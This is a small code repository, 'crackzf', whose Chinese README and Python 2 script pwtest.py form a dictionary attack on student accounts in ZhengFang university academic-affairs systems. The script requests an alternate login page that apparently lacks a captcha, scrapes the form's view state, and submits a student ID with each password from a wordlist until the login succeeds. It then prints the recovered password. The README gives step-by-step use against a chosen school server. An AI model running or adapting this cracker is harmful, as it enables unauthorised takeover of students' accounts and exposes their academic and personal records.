├── .gitattributes
├── .gitignore
├── README.md
├── dict.txt
└── pwtest.py


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | *.sln    merge=union
 7 | *.csproj merge=union
 8 | *.vbproj merge=union
 9 | *.fsproj merge=union
10 | *.dbproj merge=union
11 | 
12 | # Standard to msysgit
13 | *.doc	 diff=astextplain
14 | *.DOC	 diff=astextplain
15 | *.docx diff=astextplain
16 | *.DOCX diff=astextplain
17 | *.dot  diff=astextplain
18 | *.DOT  diff=astextplain
19 | *.pdf  diff=astextplain
20 | *.PDF	 diff=astextplain
21 | *.rtf	 diff=astextplain
22 | *.RTF	 diff=astextplain
23 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | 
  5 | # C extensions
  6 | *.so
  7 | 
  8 | # Distribution / packaging
  9 | .Python
 10 | env/
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | eggs/
 15 | lib/
 16 | lib64/
 17 | parts/
 18 | sdist/
 19 | var/
 20 | *.egg-info/
 21 | .installed.cfg
 22 | *.egg
 23 | 
 24 | # PyInstaller
 25 | #  Usually these files are written by a python script from a template 
 26 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 27 | *.manifest
 28 | *.spec
 29 | 
 30 | # Installer logs
 31 | pip-log.txt
 32 | pip-delete-this-directory.txt
 33 | 
 34 | # Unit test / coverage reports
 35 | htmlcov/
 36 | .tox/
 37 | .coverage
 38 | .cache
 39 | nosetests.xml
 40 | coverage.xml
 41 | 
 42 | # Translations
 43 | *.mo
 44 | *.pot
 45 | 
 46 | # Django stuff:
 47 | *.log
 48 | 
 49 | # Sphinx documentation
 50 | docs/_build/
 51 | 
 52 | # PyBuilder
 53 | target/
 54 | 
 55 | # =========================
 56 | # Operating System Files
 57 | # =========================
 58 | 
 59 | # OSX
 60 | # =========================
 61 | 
 62 | .DS_Store
 63 | .AppleDouble
 64 | .LSOverride
 65 | 
 66 | # Icon must end with two \r
 67 | Icon

 68 | 
 69 | # Thumbnails
 70 | ._*
 71 | 
 72 | # Files that might appear on external disk
 73 | .Spotlight-V100
 74 | .Trashes
 75 | 
 76 | # Directories potentially created on remote AFP share
 77 | .AppleDB
 78 | .AppleDesktop
 79 | Network Trash Folder
 80 | Temporary Items
 81 | .apdisk
 82 | 
 83 | # Windows
 84 | # =========================
 85 | 
 86 | # Windows image file caches
 87 | Thumbs.db
 88 | ehthumbs.db
 89 | 
 90 | # Folder config file
 91 | Desktop.ini
 92 | 
 93 | # Recycle Bin used on file shares
 94 | $RECYCLE.BIN/
 95 | 
 96 | # Windows Installer files
 97 | *.cab
 98 | *.msi
 99 | *.msm
100 | *.msp
101 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | crackzf
 2 | =======
 3 | 首先测试将正方教务的`/default2.aspx`后缀改为`/default_ysdx.aspx`能否访问，并且网址中没有hash字符串，可使用此程序
 4 | 
 5 | 此程序依赖`BeautifulSoup4`和`pycurl`
 6 | 
 7 | ## 使用方法:
 8 | 
 9 | 
10 | 将`jw_url = ""`修改为`你的教务ip`
11 | 
12 | 使用字典生成器生成字典，替换`dict.txt`
13 | 
14 | 
15 | `python pwtest.py 学号`
16 | 
17 | 例如
18 | 
19 | `python pwtest.py 12111001`
20 | 
21 | 


--------------------------------------------------------------------------------
/dict.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mcdona1d/CrackZF/9e64c830fbe36aa650d02082def04420fe8739b5/dict.txt


--------------------------------------------------------------------------------
/pwtest.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # encoding: utf-8
  3 | #-*- coding=utf-8 -*-
  4 | 
  5 | import re
  6 | import sys
  7 | import urllib
  8 | import StringIO
  9 | import pycurl
 10 | from bs4 import BeautifulSoup
 11 | 
 12 | 
 13 | jw_url = "http://10.10.8.14/"
 14 | 
 15 | f=open("dict.txt")
 16 | 
 17 | def doHTTPMethod(dest,method,params,cookie_string='',refer=''):
 18 | 
 19 |     c = pycurl.Curl()
 20 | 
 21 |     if(method == "GET"):
 22 |     	c.setopt(c.URL, str(dest) + '?' + urllib.urlencode(params))
 23 |     elif(method == "POST"):
 24 |     	c.setopt(c.URL, str(dest))
 25 |     	c.setopt(c.POST, 1)
 26 |     	c.setopt(c.POSTFIELDS, urllib.urlencode(params))
 27 | 
 28 |     if(refer):
 29 | 	c.setopt(c.REFERER, refer)
 30 | 
 31 | 
 32 |     c.setopt(c.HTTPHEADER,[
 33 |     	'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 34 |     	'Accept-Encoding: gzip, deflate',
 35 |     	'Accept-Language: en-US,en;q=0.5',
 36 |     	'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0',
 37 |     	'Cache-Control: max-age=0', 
 38 |     	'Connection: keep-alive'
 39 |     	])
 40 |  
 41 |     fp = StringIO.StringIO()
 42 |     hdr = StringIO.StringIO()
 43 | 
 44 |     c.setopt(c.WRITEFUNCTION, fp.write)
 45 |     c.setopt(c.HEADERFUNCTION, hdr.write)
 46 |     if (cookie_string != ''):
 47 |     	c.setopt(c.COOKIE,cookie_string)
 48 |  
 49 |     c.perform()
 50 | 
 51 |     result_dict = {"header":hdr.getvalue(),"body":fp.getvalue()}
 52 |     return result_dict
 53 | 
 54 | def main():
 55 | 
 56 |     xh = sys.argv[1]
 57 |     pw = f.readline().strip()
 58 |     
 59 |     while 1:
 60 | 
 61 | 	#pre_header =  doHTTPMethod(jw_url,"GET",{})['header']
 62 | 	#url_hash = pre_header[pre_header.find('Location: /(')+11:pre_header.find('/Default.aspx')];
 63 | 	
 64 | 
 65 | 	login_url = jw_url + '/default_ysdx.aspx'	#default5.aspx 
 66 | 	cookie = ""
 67 | 
 68 | 	#login_page = doHTTPMethod(login_url,"GET",{},cookie)['body']
 69 | 	login_page = doHTTPMethod(login_url,"GET",{})['body']
 70 | 	
 71 | 	vs = re.findall('<input[^>]*name=\"__VIEWSTATE\"[^>]*value=\"([^"]*)\"[^>]*>',login_page,re.S)
 72 | 	vs = vs[0]
 73 | 	
 74 | 	params = {
 75 | 	'TextBox1':xh,
 76 | 	'TextBox2':pw,
 77 | 	#'TextBox3':checkcode,
 78 | 	'__VIEWSTATE' : vs,
 79 | 	'ddl_js':'学生',
 80 | 	'Button1':' 登 录 '
 81 | 	}
 82 | 
 83 |         login_return = doHTTPMethod(login_url,"POST",params,cookie)
 84 |         login_result = login_return['body']
 85 | 
 86 | 	# Check if logged in valid
 87 |         login_result = BeautifulSoup(login_result).text
 88 | 
 89 | 
 90 | 
 91 | 	if u"用户名不存在" in login_result:
 92 | 	    success = 2
 93 | 	    
 94 | 	elif u"密码错误" in login_result:
 95 | 	    success = 0
 96 | 	    
 97 | 	#elif u"验证码不正确" in login_result:
 98 | 	    #success = 0
 99 | 	elif "xs_main.aspx" in login_result:
100 | 	    success = 1
101 | 
102 |         if (success == 2):
103 |             print "Wrong username"
104 |             break
105 |             
106 |         elif (success == 1):
107 |             print"************************"
108 |             print xh
109 |             print "This is your password:"	
110 |             print pw
111 |             print"************************"
112 |             break
113 | 
114 |         else:
115 |             print" " 
116 |             print"#################"
117 |             print "Wrong password:"
118 |             print pw
119 |             print"#################"
120 |             print" " 
121 | 
122 |             pw = f.readline().strip()
123 |             if (pw == ""):
124 |                 print"XXXXXXXXXXXXXXXX"
125 |                 print "crack fail"
126 |                 print"XXXXXXXXXXXXXXXX"
127 |                 break
128 | 
129 | if __name__ == '__main__':
130 |     main()
131 | 	
132 |     
133 | 
134 | 


--------------------------------------------------------------------------------